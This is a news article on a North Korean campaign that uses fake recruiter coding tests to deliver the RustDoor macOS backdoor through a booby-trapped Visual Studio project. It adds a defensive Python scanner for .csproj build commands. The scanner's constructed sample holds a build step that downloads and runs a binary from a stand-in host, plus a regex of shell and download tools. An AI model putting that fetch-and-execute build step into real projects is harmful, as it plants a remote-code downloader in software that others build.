Cybersecurity researchers continue to warn that North Korean threat actors are attempting to target potential victims on LinkedIn to deliver malware dubbed “RustDoor.”
The latest advisory comes from Jamf Threat Labs, which said it had discovered attempted attacks in which attackers contacted users on specialized social networks posing as recruiters for a legitimate decentralized cryptocurrency exchange (DEX) called STON.fi.
This malicious cyber activity is part of a multi-faceted campaign waged by Democratic People’s Republic of Korea (DPRK)-backed cyber threat actors to infiltrate networks of interest under the pretext of interviews and coding jobs.
The financial and cryptocurrency sectors are among the top targets for state-sponsored adversaries seeking to generate illicit revenue and achieve an ever-changing set of objectives based on the regime’s interests.
These attacks, as the US Federal Bureau of Investigation (FBI) noted in a recent advisory, take the form of “highly customized and hard-to-detect social engineering campaigns” targeting employees of decentralized finance (“DeFi”), cryptocurrency, and similar businesses.
One notable sign of North Korean social engineering activity is a request to run code or download an application on a company-owned device or a device with access to a company’s internal network.
Another aspect worth mentioning is that such attacks also include “requests to conduct ‘pre-employment testing’ or debugging exercises that involve the execution of non-standard or unknown Node.js packages, PyPI packages, scripts, or GitHub repositories.”
Incidents featuring these tactics have been widely documented in recent weeks, highlighting the continued evolution of the tooling used in these campaigns.
In the latest attack chain discovered by Jamf, as part of a purported coding challenge, victims are tricked into downloading a booby-trapped Visual Studio project that contains an embedded bash command to download two different second-stage payloads with identical functionality: “VisualStudioHelper” and “zsh_env.”
This second-stage malware is RustDoor, which the company tracks as Thiefbucket. At the time of writing, no anti-malware engines had flagged the packed coding-test file as malicious. The file was uploaded to the VirusTotal platform on August 7, 2024.
“Configuration files embedded in two separate malware samples indicate that VisualStudioHelper persists via cron, and zsh_env persists via a zshrc file,” said researchers Jaron Bradley and Ferdous Saljooki.
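The lure described above is a Visual Studio project whose build step runs a shell command that fetches the second stage. As an added example (not code from the Jamf report), the script below parses a .csproj and flags build-time commands that invoke a shell or a download tool; the sample project and its URL are constructed, and the assumption that the command lives in a pre-build event is the author's, not a detail from the report.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample .csproj (not from the Jamf report): a pre-build step that
# fetches and runs a binary over the network, which is the pattern to flag.
SAMPLE_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net8.0</TargetFramework>
    <PreBuildEvent>echo Building $(ProjectName)</PreBuildEvent>
  </PropertyGroup>
  <Target Name="Setup" BeforeTargets="PreBuildEvent">
    <Exec Command="bash -c 'curl -s http://example.invalid/VisualStudioHelper -o /tmp/vsh &amp;&amp; chmod +x /tmp/vsh &amp;&amp; /tmp/vsh'" />
  </Target>
</Project>
"""

# MSBuild elements that execute arbitrary commands when the project is built.
COMMAND_TAGS = {"Exec", "PreBuildEvent", "PostBuildEvent"}
# Indicators that a build step spawns a shell or reaches out to the network.
SUSPICIOUS = re.compile(r"\b(curl|wget|bash|zsh|sh|python|osascript|chmod\s+\+x)\b")


def strip_ns(tag):
    """Drop the MSBuild XML namespace so legacy and SDK-style projects both match."""
    return tag.rsplit("}", 1)[-1]


def find_build_commands(csproj_xml):
    """Return (tag, command) for every build-time command embedded in the project."""
    root = ET.fromstring(csproj_xml)
    found = []
    for el in root.iter():
        tag = strip_ns(el.tag)
        if tag not in COMMAND_TAGS:
            continue
        cmd = el.get("Command") if tag == "Exec" else (el.text or "")
        if cmd and cmd.strip():
            found.append((tag, cmd.strip()))
    return found


def flag_suspicious(csproj_xml):
    """Return only the build commands that invoke a shell or a download tool."""
    return [(t, c) for t, c in find_build_commands(csproj_xml) if SUSPICIOUS.search(c)]


if __name__ == "__main__":
    for tag, cmd in flag_suspicious(SAMPLE_CSPROJ):
        print(f"[!] {tag}: {cmd}")
```

Running it on a candidate project before opening it in the IDE surfaces the network-fetching build step while leaving the benign echo alone.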
RustDoor, a macOS backdoor, was first documented by Bitdefender in February 2024 in connection with a malware campaign targeting cryptocurrency companies. Subsequent analysis by S2W uncovered a Go-language variant called GateDoor aimed at infecting Windows machines.
Jamf’s findings are significant not only because they mark the first time this malware has been formally attributed to a North Korean threat actor, but also because the malware was written in Objective-C.
VisualStudioHelper is designed to act as an information stealer by collecting files specified in its configuration, but only after prompting the user for their system password, disguising the prompt as a request from Visual Studio to avoid suspicion.
However, both payloads act as backdoors and use two different servers for command and control (C2) communications.
“Threat actors remain vigilant in finding new ways to target those in the crypto industry,” the researchers said. “It is important to educate employees, including developers, not to trust individuals who connect with them on social media and ask users to run any kind of software.”
“These social engineering schemes carried out by North Korea are carried out by people who are fluent in English and who research their targets before engaging in conversations.”